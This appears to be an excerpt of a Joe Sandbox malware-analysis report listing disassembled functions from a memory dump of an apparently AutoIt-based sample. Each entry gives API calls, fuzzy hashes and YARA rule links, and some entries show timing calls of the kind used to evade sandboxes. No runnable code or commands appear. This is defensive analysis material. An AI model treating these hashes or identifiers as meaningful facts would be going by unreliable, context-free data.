                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 179378fb19dba7184b9ddb5798da8caf60514e0f972a5943ae5a99517dc51052
                                                                                                                      • Instruction ID: 55b004e78bd005d36f6daf2aa8c9d5e680497b8500d854aeec8ec078afc34c43
                                                                                                                      • Opcode Fuzzy Hash: 179378fb19dba7184b9ddb5798da8caf60514e0f972a5943ae5a99517dc51052
                                                                                                                      • Instruction Fuzzy Hash: A511187A950219FFDF11DBD8DC85E9DBBB8FB08710F204492EA04B7294D671AE10DB94
                                                                                                                      Function 003E49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E49EE
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E4A13
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E4A1D
                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,003E354D,?,003E45D5,?,00008000), ref: 003E4A50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: e67537308077bf2bbeb95df740ed6fb1efcbdd2deba420a669eefb48ff5a473e
                                                                                                                      • Instruction ID: ca4df2e5e6032a013654c1fc6cd78d20d7081a96ab9b0e37596237f9b69dd761
                                                                                                                      • Opcode Fuzzy Hash: e67537308077bf2bbeb95df740ed6fb1efcbdd2deba420a669eefb48ff5a473e
                                                                                                                      • Instruction Fuzzy Hash: AF115A31D40568DBCF01EFA6D949AEEBB78FF08721F414265E941B2280CB309560CB99
                                                                                                                      Function 003D5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                      • Instruction ID: e67c23fa2e4d9ead00bf2b7e698993b3cb9fb971b6ad920e619e25930fbf8e00
                                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                      • Instruction Fuzzy Hash: 1A01423300064EBBCF135E84EC41CED3F66BB18350B558416FA1859231D236CAB1AB81
                                                                                                                      Function 003C80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C869D: __getptd_noexit.LIBCMT ref: 003C869E
                                                                                                                      • __lock.LIBCMT ref: 003C811F
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 003C813C
                                                                                                                      • _free.LIBCMT ref: 003C814F
                                                                                                                      • InterlockedIncrement.KERNEL32(00F323D8), ref: 003C8167
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2704283638-0
                                                                                                                      • Opcode ID: aa525f8285ad5ab24664ff5c5a0b90337297c13b069cc2a278df2f25a4ad12a3
                                                                                                                      • Instruction ID: 7ad93aefd5a4598f56706ef7a8e3961a1bf672afce972f03de83fc60dc6c5c26
                                                                                                                      • Opcode Fuzzy Hash: aa525f8285ad5ab24664ff5c5a0b90337297c13b069cc2a278df2f25a4ad12a3
                                                                                                                      • Instruction Fuzzy Hash: 690161319027119BCB13AF65980AF6973A0BF04716F19011DF814EB692CF345E52CFD6
                                                                                                                      Function 003C8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 003C8768
                                                                                                                        • Part of subcall function 003C8984: __mtinitlocknum.LIBCMT ref: 003C8996
                                                                                                                        • Part of subcall function 003C8984: RtlEnterCriticalSection.NTDLL(003C0127), ref: 003C89AF
                                                                                                                      • InterlockedIncrement.KERNEL32(DC840F00), ref: 003C8775
                                                                                                                      • __lock.LIBCMT ref: 003C8789
                                                                                                                      • ___addlocaleref.LIBCMT ref: 003C87A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1687444384-0
                                                                                                                      • Opcode ID: 1f1bbc6268792922e1bb5436efcc154034f468e1d3c88112e22a285097f59fb5
                                                                                                                      • Instruction ID: a51e90b29d8ef59ff6c7e0e770744c339917b590513b7787c7539c3b9f4b03a8
                                                                                                                      • Opcode Fuzzy Hash: 1f1bbc6268792922e1bb5436efcc154034f468e1d3c88112e22a285097f59fb5
                                                                                                                      • Instruction Fuzzy Hash: 93016D72501B009FD761EF65D805B5AF7E0AF40325F20890EE49ACB2A1DB74AA44CF05
                                                                                                                      Function 0040E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003BB5EB
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB5FA
                                                                                                                        • Part of subcall function 003BB58B: BeginPath.GDI32(?), ref: 003BB611
                                                                                                                        • Part of subcall function 003BB58B: SelectObject.GDI32(?,00000000), ref: 003BB63B
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0040E860
                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 0040E86D
                                                                                                                      • EndPath.GDI32(00000000), ref: 0040E87D
                                                                                                                      • StrokePath.GDI32(00000000), ref: 0040E88B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1539411459-0
                                                                                                                      • Opcode ID: 586bba118263710f37ff54526aafa41359127d47e789d98b43c5b97ff0be7678
                                                                                                                      • Instruction ID: 4a470487e876e552a88e34f44f30283dc1f08e14c8a47854a2f1f7b4e5f3beef
                                                                                                                      • Opcode Fuzzy Hash: 586bba118263710f37ff54526aafa41359127d47e789d98b43c5b97ff0be7678
                                                                                                                      • Instruction Fuzzy Hash: B7F0BE32500259BADB262F50AC09FCE3F99AF06314F448122FA01220F187B94522CFAE
                                                                                                                      Function 003DD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003DD640
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003DD653
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003DD65A
                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 003DD661
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: a310c4917abc31440c379c89c83ca7f5ef7af6af12d7eb95e8e49c6b2605b532
                                                                                                                      • Instruction ID: 6036cb196613fe03f3a43cb35cce7589f5962c48e569d2e2d14fafb44a6f5482
                                                                                                                      • Opcode Fuzzy Hash: a310c4917abc31440c379c89c83ca7f5ef7af6af12d7eb95e8e49c6b2605b532
                                                                                                                      • Instruction Fuzzy Hash: 57E06D32A05228BAEB311FA2EC0DEEB7F1CEF117A1F808021B50C95460CB71D581CBE4
                                                                                                                      Function 003BB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 003BB0C5
                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 003BB0CF
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 003BB0E4
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 003BB0EC
                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0041ECFA
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0041ED07
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0041ED20
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0041ED39
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0041ED59
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0041ED64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      • Opcode ID: 3b265e0b0217e299b3af89bf25edefa3a0ded523a17a2aaf3a91ad4890720bb7
                                                                                                                      • Instruction ID: a1a654e70f51c03f429aaf7de0bec6c63e6fbe0dc6c94ddc596106730e4e3db8
                                                                                                                      • Opcode Fuzzy Hash: 3b265e0b0217e299b3af89bf25edefa3a0ded523a17a2aaf3a91ad4890720bb7
                                                                                                                      • Instruction Fuzzy Hash: 80E06D31A00240AEEB311F78AC0D7D97B21AB0533AF108226FB69580E2C7B18591DB15
                                                                                                                      Function 0041C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: ed3132509d1b4a678c971fd8e9feb5262081e6d19b0930bab0ea4fd07924feed
                                                                                                                      • Instruction ID: 6028dff2eded8d6a0aef4ac9395c7c6395355031f9edc00641822d23ecd24aad
                                                                                                                      • Opcode Fuzzy Hash: ed3132509d1b4a678c971fd8e9feb5262081e6d19b0930bab0ea4fd07924feed
                                                                                                                      • Instruction Fuzzy Hash: BFE04FB1A00200EFDB215F70CC4C6A97FA9FB4C355F518426FD4A8B210DA7498828B58
                                                                                                                      Function 0041C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 9e79b09b3e20f88e683269562fdbc3e1dde9b1652c28f7bfc0f820e2d8df4003
                                                                                                                      • Instruction ID: 72d9c3accca28e3ff235c9f1e54e37f8cef5799a7456bf4ce5533430b7945785
                                                                                                                      • Opcode Fuzzy Hash: 9e79b09b3e20f88e683269562fdbc3e1dde9b1652c28f7bfc0f820e2d8df4003
                                                                                                                      • Instruction Fuzzy Hash: 52E04FB1A00200EFDB115F70CC4C6997BA9FB4C355F518425F94A8B220DB7499428B54
                                                                                                                      Function 00422350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: >$DEFINE
                                                                                                                      • API String ID: 4104443479-1664449232
                                                                                                                      • Opcode ID: 9119688407ddb705969818b094281c723dd37d894d86b6846a819291fc3d8aad
                                                                                                                      • Instruction ID: 88f5d1a79225ef0ea2ff0ca8f3085a8b13c80be3bf02f45e5d7058cd254b2537
                                                                                                                      • Opcode Fuzzy Hash: 9119688407ddb705969818b094281c723dd37d894d86b6846a819291fc3d8aad
                                                                                                                      • Instruction Fuzzy Hash: 0012BE71A0022AEFCF25CF58D9806ADB7B1FF49310F59815AE805AB351D778EE81CB54
                                                                                                                      Function 003DEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 003DECA0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                                      • Opcode ID: 6c9ee0658b0648e65b6b63e7410edfe9994479e759b6f8a5cd4eedb9505c3260
                                                                                                                      • Instruction ID: f0d2fa4e848374532385eeae5a7d78bc6b475a15c22f61526980edd24d927ec0
                                                                                                                      • Opcode Fuzzy Hash: 6c9ee0658b0648e65b6b63e7410edfe9994479e759b6f8a5cd4eedb9505c3260
                                                                                                                      • Instruction Fuzzy Hash: 86914675600701AFDB15DF64D884B6ABBF9BF49710B24846EE84ACF391DBB0E841CB60
                                                                                                                      Function 003EE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3BCF: _wcscpy.LIBCMT ref: 003A3BF2
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • __wcsnicmp.LIBCMT ref: 003EE785
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003EE84E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                      • String ID: LPT
                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                      • Opcode ID: ff798cfdb1c53d7a68aaedf93ad5619c3535bbb74de8d13daa5e48643c2a410d
                                                                                                                      • Instruction ID: 3d0709624b1375741d9fcbd17b2d422f17451cd9bce0781e714ff158c7cb001b
                                                                                                                      • Opcode Fuzzy Hash: ff798cfdb1c53d7a68aaedf93ad5619c3535bbb74de8d13daa5e48643c2a410d
                                                                                                                      • Instruction Fuzzy Hash: 9F619E75A00229EFDB16DF95C891EAEB7F8EF09710F05416AF506AB390DB30AE40CB50
                                                                                                                      Function 003A1B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 003A1B83
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 003A1B9C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
